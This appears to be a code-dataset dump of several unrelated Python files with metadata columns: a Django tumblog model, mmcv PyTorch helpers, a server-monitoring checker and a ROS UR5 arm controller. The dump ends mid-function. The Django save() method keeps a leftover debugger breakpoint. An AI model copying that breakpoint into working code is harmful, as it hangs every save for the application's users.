slug = AutoSlugField(prepopulate_from = 'title', unique = True)
tags = TagField()
pubtime = models.DateTimeField(null = True, blank = True)
blog = models.ForeignKey(Blog)
modtime = models.DateTimeField(auto_now = True)
post_type = models.ForeignKey(ContentType)
published = PublishedPostManager()
objects = models.Manager()
@property
@property
def publish(self, publish_time = None):
"""
Publish is basically a wrapper for save, which adjusts the
recorded publish time on the post. If the publish_time parameter
is given, then the post will be "published" after that time. If
publish_time parameter is _not_ given, the publish_time is now,
and the item is immediately published.
"""
if publish_time is None:
publish_time = datetime.now()
self.pubtime = publish_time
self.save()
| 33.880597 | 107 | 0.65859 | from django.db import models
from django.db.models import permalink
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from datetime import datetime
from tagging.models import Tag
from tagging.fields import TagField
from autofields.fields import AutoSlugField
from tumblog.managers import PublishedPostManager
from tumblog.models import Blog
class Post(models.Model):
""" Tumblog Post Model """
title = models.CharField(max_length = 200)
author = models.ForeignKey(User, blank=True, null=True)
slug = AutoSlugField(prepopulate_from = 'title', unique = True)
tags = TagField()
pubtime = models.DateTimeField(null = True, blank = True)
blog = models.ForeignKey(Blog)
modtime = models.DateTimeField(auto_now = True)
post_type = models.ForeignKey(ContentType)
published = PublishedPostManager()
objects = models.Manager()
class Meta:
app_label = 'tumblog'
ordering = ('-pubtime',)
def __unicode__(self):
return "%s: (published: %s)" % (self.title, self.pubtime.date if self.pubtime else "not published")
def save(self, *args, **kwargs):
if not self.pk:
self.post_type = ContentType.objects.get_for_model(type(self))
import pdb; pdb.set_trace()
super(Post, self).save(*args, **kwargs)
def get_tags(self):
return Tag.objects.get_for_object(self)
@property
def inner_post(self):
return self.post_type.get_object_for_this_type(id = self.id)
@property
def template_name(self):
return "tumblog/post_%s.html" % self.post_type.model
def publish(self, publish_time = None):
"""
Publish is basically a wrapper for save, which adjusts the
recorded publish time on the post. If the publish_time parameter
is given, then the post will be "published" after that time. If
publish_time parameter is _not_ given, the publish_time is now,
and the item is immediately published.
"""
if publish_time is None:
publish_time = datetime.now()
self.pubtime = publish_time
self.save()
| 482 | 58 | 160 |
110b3a61385a3095d01b7a4cdffbe045d22cd55a | 3,215 | py | Python | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | 1 | 2019-09-25T12:26:05.000Z | 2019-09-25T12:26:05.000Z | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | null | null | null | mmcv/utils/helpers.py | manlinting/mmcv | ae9d3cc41054712ee54940d8657606afef4fc066 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import functools
import torch
import torch.nn as nn
| 37.383721 | 80 | 0.566096 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import functools
import torch
import torch.nn as nn
def load_parameters(model, src_state_dict):
logging.info('Loading Parameters...')
if isinstance(src_state_dict, str):
src_state_dict = torch.load(
src_state_dict, map_location=lambda storage, loc: storage)
dst_state_dict = model.state_dict()
for k in dst_state_dict:
if k in src_state_dict:
if src_state_dict[k].size() == dst_state_dict[k].size():
# logging.info('{}: Loaded.'.format(k))
dst_state_dict[k] = src_state_dict[k]
else:
logging.warning('{}: Ignored due to shapes.'.format(k))
else:
logging.warning('{}: Ignored due to missing.'.format(k))
model.load_state_dict(dst_state_dict)
def get_num_parameters(net):
parameters = net.state_dict()
return functools.reduce(lambda x, y: x + y,
[parameters[x].numel() for x in parameters])
def get_num_flops(net, x):
def forward_hook(m, input, output):
if type(m) == nn.Linear:
output_size = torch.tensor(output[0].shape)
flops = m.weight.numel()
if m.bias is not None:
flops += m.bias.numel()
m.flops = flops
return
if type(m) in [
nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose1d,
nn.ConvTranspose2d, nn.ConvTranspose3d
]:
output_size = torch.tensor(output[0].shape)
flops = m.weight.numel() * output_size[1:].prod() / m.groups
if m.bias is not None:
flops += m.bias.numel() * output_size[1:].prod()
m.flops = flops
return
if type(m) in [
nn.MaxPool1d, nn.MaxPool2d, nn.MaxPool3d, nn.AvgPool1d,
nn.AvgPool2d, nn.AvgPool3d
]:
output_size = torch.tensor(output[0].shape)
kernel_size = m.kernel_size
if type(kernel_size) not in (tuple, list):
kernel_size = [kernel_size] * (len(output_size) - 1)
m.flops = torch.tensor(kernel_size).prod() * output_size[1:].prod()
return
if type(m) in [nn.ReLU, nn.ReLU6, nn.PReLU, nn.Sigmoid]:
output_size = torch.tensor(output[0].shape)
m.flops = output_size.prod()
return
if type(m) in [
nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d,
nn.InstanceNorm1d, nn.InstanceNorm2d, nn.InstanceNorm3d
]:
output_size = torch.tensor(output[0].shape)
m.flops = output_size.prod() * 4 if m.affine else 2
return
assert x.shape[0] == 1
handles = list(
map(lambda x: x.register_forward_hook(forward_hook), net.modules()))
with torch.no_grad():
net(x)
list(map(lambda x: x.remove(), handles))
return sum([x.flops for x in net.modules() if hasattr(x, 'flops')])
| 2,905 | 0 | 75 |
e1c0fc71aeebac769ec087623d2868867ad8deae | 3,497 | py | Python | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | 1 | 2020-12-13T09:39:36.000Z | 2020-12-13T09:39:36.000Z | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | null | null | null | app/checkers.py | chengyuhui/srvmon | 4d2c295f268e494d8b0e97cb63037e240b3db2ec | [
"MIT"
] | null | null | null | from app import app
import requests, sys, eventlet, socket
from datetime import datetime, timedelta
from .db import Server, Record, transaction, db
from .notify import notify_state_changed
from blinker import Namespace
def handle_active_http(server):
"""
Handler for Active HTTP checking
"""
config = server.get_config()
timeout = config['timeout']
url = config['url']
valid_status = config['validStatus']
record = server.new_record()
try:
r = requests.get(url, timeout=float(timeout) / 1000)
if r.status_code in valid_status:
record.online = True
record.latency = int(r.elapsed / timedelta(milliseconds=1))
else:
record.message = f"Unsuccessful status code: {r.status_code}"
except requests.exceptions.Timeout as e:
record.message = "Timed out"
except requests.exceptions.ConnectionError as e:
record.message = "Connection error"
app.logger.debug("Check failed for [%s]: %s", server.label, e)
except:
e = sys.exc_info()[0]
record.message = str(e)
app.logger.debug("Check failed for [%s]: %s", server.label, e)
return record
def handle_active_tcp(server):
"""
Handler for Active TCP checking
"""
config = server.get_config()
timeout = config['timeout']
address = config['address']
port = config['port']
record = server.new_record()
try:
c = socket.socket()
ip = socket.gethostbyname(address)
c.settimeout(int(timeout / 1000))
start = datetime.now()
c.connect((ip, port))
end = datetime.now()
c.close()
record.online = True
record.latency = (end - start) / timedelta(milliseconds=1)
except Exception as e:
record.message = str(e)
return record
def handle_server(server):
"""
Common handler for any server
"""
config = server.get_config()
interval = config['interval']
last_record = server.last_record()
if last_record and not last_record.expired(interval):
return
log_start(server)
record = handlers[server.mode](server)
log_record(record)
with transaction():
db.session.add(record)
signal_new_record.send(record=record)
if last_record and record.online != last_record.online:
log_state_changed(server, record)
notify_state_changed(server, record)
handlers = {
'active-http': handle_active_http,
'passive-http': handle_passive_http,
'active-tcp': handle_active_tcp
}
signals = Namespace()
signal_new_record = signals.signal('new-record') | 26.9 | 79 | 0.644838 | from app import app
import requests, sys, eventlet, socket
from datetime import datetime, timedelta
from .db import Server, Record, transaction, db
from .notify import notify_state_changed
from blinker import Namespace
def log_start(server):
app.logger.debug("Start checking [%s](%s)", server.label, server.id)
def log_record(record):
if record.online:
app.logger.debug("%d is online", record.server_id)
else:
app.logger.debug("%d is offline: %s", record.server_id, record.message)
def log_state_changed(server, record):
app.logger.info("State of %s changed, online: %s", server.label,
str(record.online))
def handle_active_http(server):
"""
Handler for Active HTTP checking
"""
config = server.get_config()
timeout = config['timeout']
url = config['url']
valid_status = config['validStatus']
record = server.new_record()
try:
r = requests.get(url, timeout=float(timeout) / 1000)
if r.status_code in valid_status:
record.online = True
record.latency = int(r.elapsed / timedelta(milliseconds=1))
else:
record.message = f"Unsuccessful status code: {r.status_code}"
except requests.exceptions.Timeout as e:
record.message = "Timed out"
except requests.exceptions.ConnectionError as e:
record.message = "Connection error"
app.logger.debug("Check failed for [%s]: %s", server.label, e)
except:
e = sys.exc_info()[0]
record.message = str(e)
app.logger.debug("Check failed for [%s]: %s", server.label, e)
return record
def handle_active_tcp(server):
"""
Handler for Active TCP checking
"""
config = server.get_config()
timeout = config['timeout']
address = config['address']
port = config['port']
record = server.new_record()
try:
c = socket.socket()
ip = socket.gethostbyname(address)
c.settimeout(int(timeout / 1000))
start = datetime.now()
c.connect((ip, port))
end = datetime.now()
c.close()
record.online = True
record.latency = (end - start) / timedelta(milliseconds=1)
except Exception as e:
record.message = str(e)
return record
def handle_passive_http(server):
# print(server)
pass
def handle_server(server):
"""
Common handler for any server
"""
config = server.get_config()
interval = config['interval']
last_record = server.last_record()
if last_record and not last_record.expired(interval):
return
log_start(server)
record = handlers[server.mode](server)
log_record(record)
with transaction():
db.session.add(record)
signal_new_record.send(record=record)
if last_record and record.online != last_record.online:
log_state_changed(server, record)
notify_state_changed(server, record)
def task_check():
servers = Server.query.filter_by(enabled=True).all()
threads = []
for server in servers:
threads.append(eventlet.spawn(handle_server, server))
for thread in threads:
try:
thread.wait()
except Exception as e:
app.logger.error("Error when running task for server: %s", e)
handlers = {
'active-http': handle_active_http,
'passive-http': handle_passive_http,
'active-tcp': handle_active_tcp
}
signals = Namespace()
signal_new_record = signals.signal('new-record') | 743 | 0 | 115 |
778192d1dd5ce7f3a6e52e024267de15e2f06d4c | 14,970 | py | Python | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | 1 | 2021-09-09T04:41:28.000Z | 2021-09-09T04:41:28.000Z | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | null | null | null | pkg_task6/scripts/ur5_moveit/ur5_moveit.py | 1arshan/Eyantra_Virgi-bot | 30ebe99fec6a0d4767fe94468b21bc00091bc527 | [
"MIT"
] | null | null | null | #! /usr/bin/env python2.7
"""
This file contain Ur5Moveit class to control bot and rviz planning scene.
"""
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
from pkg_vb_sim.srv import conveyorBeltPowerMsg
import math
import sys
import copy
from std_srvs.srv import Empty
import sys
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from pyzbar.pyzbar import decode
def define_joint_angle_list(shoulder_pan_joint, shoulder_lift_joint, elbow_joint, wrist_1_joint, wrist_2_joint, wrist_3_joint):
"""
This function takes float values for each joint and returns a list.
:param shoulder_pan_joint: shoulder pan joint angle
:param shoulder_lift_joint: shoulder lift join angle
:param elbow_joint: elbow joint angle
:param wrist_1_joint: wrist 1 joint angle
:param wrist_2_joint: wrist 2 joint angle
:param wrist_3_joint: wrist 3 joint angle
:return: list of all joint angles
"""
joint_angles = [math.radians(shoulder_pan_joint),
math.radians(shoulder_lift_joint),
math.radians(elbow_joint),
math.radians(wrist_1_joint),
math.radians(wrist_2_joint),
math.radians(wrist_3_joint)]
return joint_angles
def define_pose(x, y, z):
"""
This function define geometry_msgs.msg.Pose() from giving coordinates.
:param x: x coordinate
:param y: y coordinate
:param z: z coordinate
:return: ur5_pose of type geometry_msgs.msg.Pose() containing x,y,z coordinate.
"""
ur5_pose = geometry_msgs.msg.Pose()
ur5_pose.position.x = x
ur5_pose.position.y = y
ur5_pose.position.z = z
ur5_pose.orientation.x = -0.5
ur5_pose.orientation.y = -0.5
ur5_pose.orientation.z = 0.5
ur5_pose.orientation.w = 0.5
return ur5_pose
def get_item_details(item):
"""
This function finds packgen details using item
:param item: item is a string containing packgen content type
:return: it returns dict of details of packgen.
"""
details = {'Estimated Time of Delivery':'Na','priority':'Na','cost':'Na','item':'Na'}
if item == u'Medicines' or item == u'Medicine':
details = {'priority':'HP','cost':'450','Estimated Time of Delivery':'1','item':'Medicines'}
elif item == u'Food':
details = {'priority':'MP','cost':'250','Estimated Time of Delivery':'3',"item":'Food'}
elif item == u'Clothes':
details = {'priority':'LP','cost':'150','Estimated Time of Delivery':'5','item':'Clothes'}
return details
class Ur5Moveit:
"""
This class enables bot and rviz connection, and setup the configuration of ur5 bot.
Select bot name, planning group ,etc.
"""
def __init__(self,robot_name):
"""
Constructor
:param robot_name: name of bot which you want to control.
"""
self.is_conver_active = False
self._box_name = 'box'
self.box_name = 'box'
self._robot_ns = '/'+robot_name
self._planning_group = "manipulator"
self._commander = moveit_commander.roscpp_initialize(sys.argv)
self._robot = moveit_commander.RobotCommander(robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
self._group = moveit_commander.MoveGroupCommander(self._planning_group, robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._display_trajectory_publisher = rospy.Publisher( self._robot_ns + '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=1)
self._exectute_trajectory_client = actionlib.SimpleActionClient( self._robot_ns + '/execute_trajectory', moveit_msgs.msg.ExecuteTrajectoryAction)
self._exectute_trajectory_client.wait_for_server()
self._planning_frame = self._group.get_planning_frame()
self._eef_link = self._group.get_end_effector_link()
self._group_names = self._robot.get_group_names()
self._computed_plan = ''
# Current State of the Robot is needed to add box to planning scene
self._curr_state = self._robot.get_current_state()
rospy.loginfo('\033[94m' + "Planning Group: {}".format(self._planning_frame) + '\033[0m')
rospy.loginfo('\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
rospy.loginfo('\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
rospy.loginfo('\033[94m' + " >>> ur5_moveit init done." + '\033[0m')
@property
def ee_cartesian_translation(self, trans_x, trans_y, trans_z):
"""
This function helps in translating bot in x,y,z direction using cartesian coordinate system.
:param trans_x: Displacement in x direction.
:param trans_y: Displacement in y direction.
:param trans_z: Displacement in z direction.
"""
# 1. Create a empty list to hold waypoints
waypoints = [self._group.get_current_pose().pose]
# 2. Add Current Pose to the list of waypoints
# 3. Create a New waypoint
wpose = geometry_msgs.msg.Pose()
wpose.position.x = waypoints[0].position.x + trans_x
wpose.position.y = waypoints[0].position.y + trans_y
wpose.position.z = waypoints[0].position.z + trans_z
# This to keep EE parallel to Ground Plane
wpose.orientation.x = -0.5
wpose.orientation.y = -0.5
wpose.orientation.z = 0.5
wpose.orientation.w = 0.5
# 4. Add the new waypoint to the list of waypoints
waypoints.append(copy.deepcopy(wpose))
# 5. Compute Cartesian Path connecting the waypoints in the list of waypoints
(plan, fraction) = self._group.compute_cartesian_path(
waypoints, # waypoints to follow
0.01, # Step Size, distance between two adjacent computed waypoints will be 1 cm
0.0) # Jump Threshold
rospy.loginfo("Path computed successfully. Moving the arm.")
# The reason for deleting the first two waypoints from the computed Cartesian Path can be found here,
# https://answers.ros.org/question/253004/moveit-problem-error-trajectory-message-contains-waypoints-that-are-not-strictly-increasing-in-time/?answer=257488#post-id-257488
num_pts = len(plan.joint_trajectory.points)
if num_pts >= 3:
del plan.joint_trajectory.points[0]
del plan.joint_trajectory.points[1]
# 6. Make the arm follow the Computed Cartesian Path
self._group.execute(plan)
def wait_for_state_update(self, box_is_known=False, box_is_attached=False,box_name='box', timeout=4):
"""
Check status of box in rviz
:param timeout: time period
:param box_is_known: State of box
:param box_is_attached: State of box
:param box_name: Name of box in rviz
:return: boolean
"""
box_name = box_name or self.box_name
scene = self._scene
start = rospy.get_time()
seconds = rospy.get_time()
while (seconds - start < timeout) and not rospy.is_shutdown():
# Test if the box is in attached objects
attached_objects = scene.get_attached_objects([box_name])
is_attached = len(attached_objects.keys()) > 0
# Test if the box is in the scene.
# Note that attaching the box will remove it from known_objects
is_known = box_name in scene.get_known_object_names()
# Test if we are in the expected state
if (box_is_attached == is_attached) and (box_is_known == is_known):
print("box is attached")
return True
# Sleep so that we give other threads time on the processor
rospy.sleep(0.1)
# If we exited the while loop without returning then we timed out
return False
## END_SUB_TUTORIAL
def add_box(self,x,y,z,b_name):
"""
This function adds a box in rviz planning scene.
:param x: x coordinate of box
:param y: y coordinate of box
:param z: z coordinate of box
:param b_name: name to be given to the box in planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
box_pose = geometry_msgs.msg.PoseStamped()
box_pose.header.frame_id = "world"
box_pose.pose.orientation.w = 0.0
box_pose.pose.position.x = x #0.02
box_pose.pose.position.y = y # 0.45
box_pose.pose.position.z = z
scene.add_box(box_name, box_pose, size=(0.15, 0.15, 0.15))
self.box_name=box_name
return self.wait_for_state_update(box_is_known=True, box_name=box_name,timeout=4)
def attach_box(self,b_name, timeout=4):
"""
This function attach to box with vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be attached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
robot = self._robot
scene = self._scene
eef_link = self._eef_link
grasping_group = self._planning_group
touch_links = robot.get_link_names(group=grasping_group)
scene.attach_box(eef_link, box_name, touch_links=touch_links)
return self.wait_for_state_update(box_is_attached=True, box_is_known=False,box_name=box_name, timeout=timeout)
def detach_box(self,b_name, timeout=4):
"""
This function detach to box from vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be detached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
eef_link = self._eef_link
scene.remove_attached_object(eef_link, name=box_name)
# We wait for the planning scene to update.
return self.wait_for_state_update(box_is_known=True, box_is_attached=False,box_name=box_name, timeout=timeout)
def remove_box(self,b_name, timeout=4):
"""
This function removes box form rviz planning scene.
:param timeout: time period
:param b_name: name of box which need to be removed from planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
scene.remove_world_object(box_name)
return self.wait_for_state_update(box_is_attached=False, box_is_known=False,box_name=box_name, timeout=timeout)
def go_to_pose(self, arg_pose):
"""
This function plans path to a pose and move ur5 to that pose.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:return: boolean
"""
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Current Pose:" + '\033[0m')
rospy.loginfo(pose_values)
self._group.set_pose_target(arg_pose)
flag_plan = self._group.go(wait=True) # wait=False for Async Move
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Final Pose:" + '\033[0m')
rospy.loginfo(pose_values)
list_joint_values = self._group.get_current_joint_values()
rospy.loginfo('\033[94m' + ">>> Final Joint Values:" + '\033[0m')
rospy.loginfo(list_joint_values)
if flag_plan:
rospy.loginfo('\033[94m' + ">>> go_to_pose_angle() Success" + '\033[0m')
else:
rospy.logerr(
'\033[94m' + ">>> go_to_pose() Failed. Solution for Pose not Found." + '\033[0m')
return flag_plan
def hard_go_to_pose(self, arg_pose, arg_max_attempts):
"""
This function calls go_to_pose() function multiple time until it succeed or reaches maximum attempt limit.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:param arg_max_attempts: maximum attempts for calling go_to_pose()
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.go_to_pose(arg_pose)
rospy.logwarn("attempts: {}".format(number_attempts) )
return flag_success
def set_joint_angles(self, arg_list_joint_angles):
"""
This function sets angle of each joint of ur5 to reach a specific position.
:param arg_list_joint_angles: list of joints
:return: boolean
"""
self._group.set_joint_value_target(arg_list_joint_angles)
self._computed_plan = self._group.plan()
flag_plan = self._group.go(wait=True)
if flag_plan:
rospy.loginfo(
'\033[94m' + ">>> set_joint_angles() Success" + '\033[0m')
else:
rospy.logerr(
'\033[94m' + ">>> set_joint_angles() Failed." + '\033[0m')
return flag_plan
def hard_set_joint_angles(self, arg_list_joint_angles, arg_max_attempts):
"""
This function calls set_joint_angles() multiple times until it succeed or reaches maximum attempt limit
:param arg_list_joint_angles: list of all joint angles
:param arg_max_attempts: maximum attempt
:return: boolean
"""
number_attempts = 0
flag_success = False
while (number_attempts <= arg_max_attempts) and (flag_success is False):
number_attempts += 1
flag_success = self.set_joint_angles(arg_list_joint_angles)
rospy.logwarn("attempts: {}".format(number_attempts) )
# self.clear_octomap()
return flag_success
def trigger_converbelt(self,value):
"""
this function sets belt speed using ros service
:param value: value of speed.
:return: null
"""
x = rospy.ServiceProxy('eyrc/vb/conveyor/set_power', conveyorBeltPowerMsg)
y = x(value)
print(y)
self.is_conver_active = value
def __del__(self):
"""
Destructor
:return: null
"""
moveit_commander.roscpp_shutdown()
rospy.loginfo(
'\033[94m' + "Object of class ur5_moveit Deleted." + '\033[0m')
| 38.48329 | 179 | 0.64676 | #! /usr/bin/env python2.7
"""
This file contain Ur5Moveit class to control bot and rviz planning scene.
"""
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
from pkg_vb_sim.srv import conveyorBeltPowerMsg
import math
import sys
import copy
from std_srvs.srv import Empty
import sys
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from pyzbar.pyzbar import decode
def define_joint_angle_list(shoulder_pan_joint, shoulder_lift_joint, elbow_joint, wrist_1_joint, wrist_2_joint, wrist_3_joint):
"""
This function takes float values for each joint and returns a list.
:param shoulder_pan_joint: shoulder pan joint angle
:param shoulder_lift_joint: shoulder lift join angle
:param elbow_joint: elbow joint angle
:param wrist_1_joint: wrist 1 joint angle
:param wrist_2_joint: wrist 2 joint angle
:param wrist_3_joint: wrist 3 joint angle
:return: list of all joint angles
"""
joint_angles = [math.radians(shoulder_pan_joint),
math.radians(shoulder_lift_joint),
math.radians(elbow_joint),
math.radians(wrist_1_joint),
math.radians(wrist_2_joint),
math.radians(wrist_3_joint)]
return joint_angles
def define_pose(x, y, z):
"""
This function define geometry_msgs.msg.Pose() from giving coordinates.
:param x: x coordinate
:param y: y coordinate
:param z: z coordinate
:return: ur5_pose of type geometry_msgs.msg.Pose() containing x,y,z coordinate.
"""
ur5_pose = geometry_msgs.msg.Pose()
ur5_pose.position.x = x
ur5_pose.position.y = y
ur5_pose.position.z = z
ur5_pose.orientation.x = -0.5
ur5_pose.orientation.y = -0.5
ur5_pose.orientation.z = 0.5
ur5_pose.orientation.w = 0.5
return ur5_pose
def get_item_details(item):
"""
This function finds packgen details using item
:param item: item is a string containing packgen content type
:return: it returns dict of details of packgen.
"""
details = {'Estimated Time of Delivery':'Na','priority':'Na','cost':'Na','item':'Na'}
if item == u'Medicines' or item == u'Medicine':
details = {'priority':'HP','cost':'450','Estimated Time of Delivery':'1','item':'Medicines'}
elif item == u'Food':
details = {'priority':'MP','cost':'250','Estimated Time of Delivery':'3',"item":'Food'}
elif item == u'Clothes':
details = {'priority':'LP','cost':'150','Estimated Time of Delivery':'5','item':'Clothes'}
return details
class Ur5Moveit:
"""
This class enables bot and rviz connection, and setup the configuration of ur5 bot.
Select bot name, planning group ,etc.
"""
def __init__(self,robot_name):
"""
Constructor
:param robot_name: name of bot which you want to control.
"""
self.is_conver_active = False
self._box_name = 'box'
self.box_name = 'box'
self._robot_ns = '/'+robot_name
self._planning_group = "manipulator"
self._commander = moveit_commander.roscpp_initialize(sys.argv)
self._robot = moveit_commander.RobotCommander(robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
self._group = moveit_commander.MoveGroupCommander(self._planning_group, robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._display_trajectory_publisher = rospy.Publisher( self._robot_ns + '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=1)
self._exectute_trajectory_client = actionlib.SimpleActionClient( self._robot_ns + '/execute_trajectory', moveit_msgs.msg.ExecuteTrajectoryAction)
self._exectute_trajectory_client.wait_for_server()
self._planning_frame = self._group.get_planning_frame()
self._eef_link = self._group.get_end_effector_link()
self._group_names = self._robot.get_group_names()
self._computed_plan = ''
# Current State of the Robot is needed to add box to planning scene
self._curr_state = self._robot.get_current_state()
rospy.loginfo('\033[94m' + "Planning Group: {}".format(self._planning_frame) + '\033[0m')
rospy.loginfo('\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
rospy.loginfo('\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
rospy.loginfo('\033[94m' + " >>> ur5_moveit init done." + '\033[0m')
@property
def group(self):
return self._group
def ee_cartesian_translation(self, trans_x, trans_y, trans_z):
"""
This function helps in translating bot in x,y,z direction using cartesian coordinate system.
:param trans_x: Displacement in x direction.
:param trans_y: Displacement in y direction.
:param trans_z: Displacement in z direction.
"""
# 1. Create a empty list to hold waypoints
waypoints = [self._group.get_current_pose().pose]
# 2. Add Current Pose to the list of waypoints
# 3. Create a New waypoint
wpose = geometry_msgs.msg.Pose()
wpose.position.x = waypoints[0].position.x + trans_x
wpose.position.y = waypoints[0].position.y + trans_y
wpose.position.z = waypoints[0].position.z + trans_z
# This to keep EE parallel to Ground Plane
wpose.orientation.x = -0.5
wpose.orientation.y = -0.5
wpose.orientation.z = 0.5
wpose.orientation.w = 0.5
# 4. Add the new waypoint to the list of waypoints
waypoints.append(copy.deepcopy(wpose))
# 5. Compute Cartesian Path connecting the waypoints in the list of waypoints
(plan, fraction) = self._group.compute_cartesian_path(
waypoints, # waypoints to follow
0.01, # Step Size, distance between two adjacent computed waypoints will be 1 cm
0.0) # Jump Threshold
rospy.loginfo("Path computed successfully. Moving the arm.")
# The reason for deleting the first two waypoints from the computed Cartesian Path can be found here,
# https://answers.ros.org/question/253004/moveit-problem-error-trajectory-message-contains-waypoints-that-are-not-strictly-increasing-in-time/?answer=257488#post-id-257488
num_pts = len(plan.joint_trajectory.points)
if num_pts >= 3:
del plan.joint_trajectory.points[0]
del plan.joint_trajectory.points[1]
# 6. Make the arm follow the Computed Cartesian Path
self._group.execute(plan)
def wait_for_state_update(self, box_is_known=False, box_is_attached=False,box_name='box', timeout=4):
"""
Check status of box in rviz
:param timeout: time period
:param box_is_known: State of box
:param box_is_attached: State of box
:param box_name: Name of box in rviz
:return: boolean
"""
box_name = box_name or self.box_name
scene = self._scene
start = rospy.get_time()
seconds = rospy.get_time()
while (seconds - start < timeout) and not rospy.is_shutdown():
# Test if the box is in attached objects
attached_objects = scene.get_attached_objects([box_name])
is_attached = len(attached_objects.keys()) > 0
# Test if the box is in the scene.
# Note that attaching the box will remove it from known_objects
is_known = box_name in scene.get_known_object_names()
# Test if we are in the expected state
if (box_is_attached == is_attached) and (box_is_known == is_known):
print("box is attached")
return True
# Sleep so that we give other threads time on the processor
rospy.sleep(0.1)
# If we exited the while loop without returning then we timed out
return False
## END_SUB_TUTORIAL
def add_box(self,x,y,z,b_name):
"""
This function adds a box in rviz planning scene.
:param x: x coordinate of box
:param y: y coordinate of box
:param z: z coordinate of box
:param b_name: name to be given to the box in planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
box_pose = geometry_msgs.msg.PoseStamped()
box_pose.header.frame_id = "world"
box_pose.pose.orientation.w = 0.0
box_pose.pose.position.x = x #0.02
box_pose.pose.position.y = y # 0.45
box_pose.pose.position.z = z
scene.add_box(box_name, box_pose, size=(0.15, 0.15, 0.15))
self.box_name=box_name
return self.wait_for_state_update(box_is_known=True, box_name=box_name,timeout=4)
def attach_box(self,b_name, timeout=4):
"""
This function attach to box with vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be attached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
robot = self._robot
scene = self._scene
eef_link = self._eef_link
grasping_group = self._planning_group
touch_links = robot.get_link_names(group=grasping_group)
scene.attach_box(eef_link, box_name, touch_links=touch_links)
return self.wait_for_state_update(box_is_attached=True, box_is_known=False,box_name=box_name, timeout=timeout)
def detach_box(self,b_name, timeout=4):
"""
This function detach to box from vacuum gripper in rviz planning scene to avoid collision
:param b_name:box name which needs to be detached.
:param timeout: time period
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
eef_link = self._eef_link
scene.remove_attached_object(eef_link, name=box_name)
# We wait for the planning scene to update.
return self.wait_for_state_update(box_is_known=True, box_is_attached=False,box_name=box_name, timeout=timeout)
def remove_box(self,b_name, timeout=4):
"""
This function removes box form rviz planning scene.
:param timeout: time period
:param b_name: name of box which need to be removed from planning scene
:return: boolean
"""
box_name = b_name or self.box_name
scene = self._scene
scene.remove_world_object(box_name)
return self.wait_for_state_update(box_is_attached=False, box_is_known=False,box_name=box_name, timeout=timeout)
def go_to_pose(self, arg_pose):
"""
This function plans path to a pose and move ur5 to that pose.
:param arg_pose: pose of desired location of type geometry_msgs.msg.Pose()
:return: boolean
"""
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Current Pose:" + '\033[0m')
rospy.loginfo(pose_values)
self._group.set_pose_target(arg_pose)
flag_plan = self._group.go(wait=True) # wait=False for Async Move
pose_values = self._group.get_current_pose().pose
rospy.loginfo('\033[94m' + ">>> Final Pose:" + '\033[0m')
rospy.loginfo(pose_values)
list_joint_values = self._group.get_current_joint_values()
rospy.loginfo('\033[94m' + ">>> Final Joint Values:" + '\033[0m')
rospy.loginfo(list_joint_values)
if flag_plan:
rospy.loginfo('\033[94m' + ">>> go_to_pose_angle() Success" + '\033[0m')
else:
rospy.logerr(
